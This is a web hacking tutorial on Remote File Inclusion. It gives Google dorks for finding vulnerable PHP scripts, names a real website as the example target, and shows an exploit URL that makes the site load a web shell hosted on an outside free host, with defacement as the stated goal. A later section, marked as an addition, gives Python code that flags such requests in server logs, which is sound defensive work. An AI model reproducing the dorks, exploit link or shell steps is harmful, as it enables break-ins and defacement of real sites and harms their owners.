How to hack a website using RFI method
RFI (Remote File Inclusion) is a method of injecting a link to a remote file into the server to get access to the site. Using this vulnerability, an attacker can deface the site or compromise its data.
* Before getting started (things required)
- A shell uploaded to any web hosting, try my3gb( dot )com (any shell you like)
- Vulnerable site
- A sharp brain
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
How to Hack website using RFI method
After uploading the shell to the hosting, get its link, e.g. username.my3gb.com/shell_name.php. Now for the vulnerable site. You can get them by using dorks. I am using this site: http://www.cbspk.com
Here's the vulnerable link of the site: http://www.cbspk.com/v2/index.php?page=site link here.
Now, to check whether the site is vulnerable or not, put any site link after ?page=, for example:
http://www.cbspk.com/v2/index.php?page=http://google.com
If it opens google.com in the same page then it's vulnerable, and if it doesn't then check another site.
Now, after getting the vulnerable site, replace http://google.com with your shell link. The exploit link will be:
http://www.cbspk.com/v2/index.php?page=http://username.my3gb.com/shell.php?
Also add ? to the end of the link. If the site is vulnerable, it will embed the page in the site.
After successful execution, the only thing left is your creativity: defacing.
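Requests of the `?page=http://...` form described above stand out in web server access logs. The following is an added example, not part of the original tutorial: it flags any query parameter whose decoded value is an absolute URL, generalized to https and ftp schemes and to percent-encoded variants. The combined log format, sample lines, IP addresses and hostnames are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target inside a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute URL, e.g. ?page=http://...
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, .test hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /v2/index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /v2/index.php?page=http://google.com HTTP/1.1" 200 18233',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /v2/index.php?page=HTTP%3A%2F%2Fhost.example.test%2Fs.php%3F HTTP/1.1" 200 901',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /v2/index.php?page=http%253A%252F%252Fhost.example.test%252Fs.txt HTTP/1.1" 404 0',
]


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253A -> %3A -> :) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_lines):
    """Return (client, path, param, value, trailing_qmark) per suspicious parameter."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        client = line.split(" ", 1)[0]
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            value = fully_decode(raw)
            if REMOTE_RE.match(value):
                # A trailing "?" matches the final link format shown on this page.
                hits.append((client, target.path, name, value, value.endswith("?")))
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Parameters that legitimately carry URLs, such as redirect targets, will also match, so scope alerts to parameters that feed file includes.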
Hope you enjoyed the tutorial "How to hack a website using RFI method", and don't forget to share it.